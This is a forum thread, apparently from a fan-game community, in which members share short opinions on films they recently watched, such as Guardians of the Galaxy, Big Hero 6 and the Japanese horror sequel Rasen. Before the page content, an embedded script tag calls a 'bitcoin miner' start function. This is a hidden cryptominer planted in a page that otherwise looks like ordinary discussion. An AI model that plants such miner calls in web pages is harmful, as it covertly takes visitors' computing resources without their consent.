<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitysmw centralpge project

Last movie you watched?

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Re: Last movie you watched?

Postby Whimsical Calamari » 5 years ago

I saw Guardians of the Galaxy last Saturday but I can't say it's the last movie I watched because it was the first of a double feature so

Maleficent was a heck of a Mary Sue story, I tell ya hwat.

metasomnia?
spinny pyromaniac
First name: Meta

Postby metasomnia? » 5 years ago

The Wall
I didn't watch it while stoned, as recommended

It was very confusing after our translator left, and it gave me nightmares

Sorel
In the shadows
First name: Alexander
Pronouns: he/him/his

Postby Sorel » 5 years ago

I am Groot

GanonTEK
Evil King
Location: Ireland. The Emerald Isle. (We got no emeralds though)

Postby GanonTEK » 5 years ago

I saw the Lego movie the other day.
Everything is.. alright.

I saw A good day to die hard last night.
Everything is.. meh.

TheFinalSentinel
Low rates,%Percent%signs%, I dunno
First name: £ٌœ'ƒھ‡ح¼円Qف-‹";ôىù♪ïظ§»ھ

Postby TheFinalSentinel » 5 years ago

I... AM... GROOOOOOOOOOOOOT!

Sorel
In the shadows

TheFinalSentinel wrote:I... AM... GROOOOOOOOOOOOOT!
poor 10 Kree warriors

Granix

Postby Granix » 5 years ago

Watched The Lego movie while ago. I've got to say it's awesome!

GanonTEK
Evil King
Location: Ireland. The Emerald Isle. (We got no emeralds though)

Postby GanonTEK » 5 years ago

The Angry Video Game Nerd - The movie. :geek:

It was alright. Bit cheesy in places. As long as you don't go with with your expectations set too high you'll be satisfied. I enjoyed it.

Grey V

Postby Grey V » 5 years ago

I saw Guardians of the Galaxy. It was entertaining. I thought the "I am Groot" thing would stop being funny after a while, but in the end it felt like it worked well. I look forward to the sequel.

swirlybomb
a bomb that is swirly
First name: Swirlus Bomberton

Postby swirlybomb » 5 years ago

Just saw The Boxtrolls today. I had zero idea what to expect going in (as the only trailer I saw was the one that basically just showed how stop-motion animation is made), other than it was from the makers of Coraline so standards were high, but it was pretty amazing! Would certainly recommend, especially if you have an appreciation for stop-motion animation (and stay until the end of the first part of the credits!!).

Also saw Guardians Of The Galaxy a bit ago, and yeah, it was really entertaining too, of course. I think there was way more language than there really needed to be, though (and its rating is PG for "violence" with no mention of language... what?).
anonymousbl00dlust wrote:All the obstacles in my level can be beaten on the players first attempt without any 'future predicting'.

Whimsical Calamari

So I just had to run my brain in safe mode for about five minutes after Being John Malkovich. That movie was fantastic.
Last edited by Whimsical Calamari on 21 Oct 2014, 06:39, edited 1 time in total.

Neo7

Postby Neo7 » 5 years ago

Finally got to see X-Men Days of Future Past as I was not able to see it in theaters. Wasn't too thrilled at how Trask's character was portrayed but was still good.

Doctor Shemp
Banned

Postby Doctor Shemp » 5 years ago

I re-watched Nightmare on Elm Street 2: Freddy's Revenge. It's both gayer (before I set you off, I don't mean that pejoratively, I mean there's gay subtext throughout) and more confusing than I remembered, but when it works (which isn't often) it works very well. It's still leagues better than Final Nightmare though, and I think maybe better than Dream Child. EDIT: Having rewatched Dream Child, which was also super variable, it's not better.
Last edited by Doctor Shemp on 02 Nov 2014, 03:55, edited 1 time in total.

Shepsmeister
w
First name: vic
Pronouns: they/he

Postby Shepsmeister » 5 years ago

i saw Book of Life recently and it is absolutely gorgeous, i love the characters designs, and the pacing seemed good
i can't comment on if it represented a cultural story well since i'm not mexican/spanish/?, but i liked it a lot

Whimsical Calamari

Just saw Scott Pilgrim. Finally.
It's a brilliant movie and everything about it, from a film standpoint, is wonderful. It really did suffer from being written before the story was finished, though, since the differences from the books got progressively more disappointing.

swirlybomb
a bomb that is swirly
First name: Swirlus Bomberton

Postby swirlybomb » 5 years ago

BIG HERO 6

GO SEE IT RIGHT NOW

!!!!!
Can't help but wonder why Hiro didn't give his own suit any special powers? Unless the idea was that riding Baymax was his thing...?
anonymousbl00dlust wrote:All the obstacles in my level can be beaten on the players first attempt without any 'future predicting'.

🦆 RedMageSusie
Dancing with the moonlit knight

Postby RedMageSusie » 5 years ago

Saw Book of Life and Big Hero 6 recently. Would recommend both. They're both very well done, but in different ways.

Book of Life was fun and visually beautiful. My biggest complaint was

the trailer led me to believe that more of the story would take place in the land of the dead. By the time he was there, the movie was almost over. I think they may have spent a bit too much time setting up the plot. And the random disappearing accents got a bit irksome.

Nothing was bad enough that it took way from the enjoyment, so I would still recommend it.

Big Hero 6 had a better flow to it. And it was a pretty heartwarming tale. There was one point near the end where

I kinda felt they should've left the villain's daughter dead. It just felt kinda hammy to suddenly be like "there's a life inside the portal still!" But it did lead to a nice scene near the end of that sequence. And it's a family movie, so I don't really feel it's a major fault.

If I had to choose between the two, I would say this one was the better one, but both were great.

ano0maly
Discord User

Postby ano0maly » 5 years ago

I watched Big Hero 6 today too. The last movie I watched in theaters was Guardians of the Galaxy.

Kinda weird that they both have the same pattern of "people with unusual hobbies develop into a superheroes team at the end" plot.

Image The talkhaus Discord server. Come ask for an invite to join!

Now the sole biggest

spitznagl
­­­­~1.68e+7 real colors

Postby spitznagl » 5 years ago

The last movie I watched was Luigi_x_Yoshi_300.avi

The resolution is pretty bad but at least the story is fine.
ImageImage

Sorel
In the shadows

Last movie you watched?

I watched Mockingjay today.

It was pretty close to the book, which is something not that many movies based on books have pulled off, but as always, knowing the plot from the book makes the plot of the movie predictable.

Tl;dr, if you are someone who is interested in how they used the material of the book or haven't read the book then go and give it a try.

Doctor Shemp
Banned

Postby Doctor Shemp » 5 years ago

I watched Rasen (The Spiral). It's the original sequel to Ring (the original Japanese Ring that is) that was later retconned into oblivion by Ring 2 (which I haven't seen yet). I can certainly see why they'd want to retcon it. It's not a patch on Ring. While Ring had some bits that didn't make too much sense if you stopped to think about them, Rasen has bits that immediately don't make sense. Also, you know how most horror movies have a twist near the end, where you think everything's fine but then suddenly it's not? Ring had a really well-done one. Anyway, Rasen has about four or five twists. It got to the point near the end where I no longer cared about what they thought was going on because I knew that they'd be proved wrong in 10 minutes or so. Unlike in a mystery, where the solution is foreshadowed, none of the twists were foreshadowed. They just happened. To add insult to injury, some of the plot elements not only stop Rasen from making sense but retroactively stop Ring from making sense by retconning the motives and knowledge of two main characters. This is particularly galling because Ring and Rasen were made simultaneously and released as a double feature (an idea that was probably born out of a long night on sake, but whatever). My point is if you're making both simultaneously how do you fuck up the continuity to the point that one retcons the other? Especially when the retcon means the ending of Ring no longer makes sense!

So, overall, it's a film that isn't good and worsens a very good film into the bargain. And, to make it more offensive, the acting in Rasen is (in my opinion) considerably better than in Ring, so they wasted good talent on the wrong movie.

Jesuiscontent
Tsundere
First name: cool old field

Postby Jesuiscontent » 4 years ago

I watched Furry : the movie Wolf Children yesterday. The story was pretty simple and predictable and there's some easy tears in the eyes moments but it was still pretty cute and enjoyable and the characters are very likeable. I found interesting how

the kids end up turning into the opposite of what they were in the beginning, I didn't expect that.

. Top tier animation too

Sorel
In the shadows

Last movie you watched?

Postby Sorel » 4 years ago

I watched 47 Ronin today, and I gotta admit, I really love movies based on japanese Samurai.

Have you got any good recommendations?

kingmetaknight1

Postby kingmetaknight1 » 4 years ago

Christmas with the Kranks

Bwarch
Local Candy Fiend
Pronouns: He/Him/His

Postby Bwarch » 4 years ago

FluffiMasta wrote:I watched 47 Ronin today, and I gotta admit, I really love movies based on japanese Samurai.

Have you got any good recommendations?
Blade.

Obviously.

Return to “the gazebo”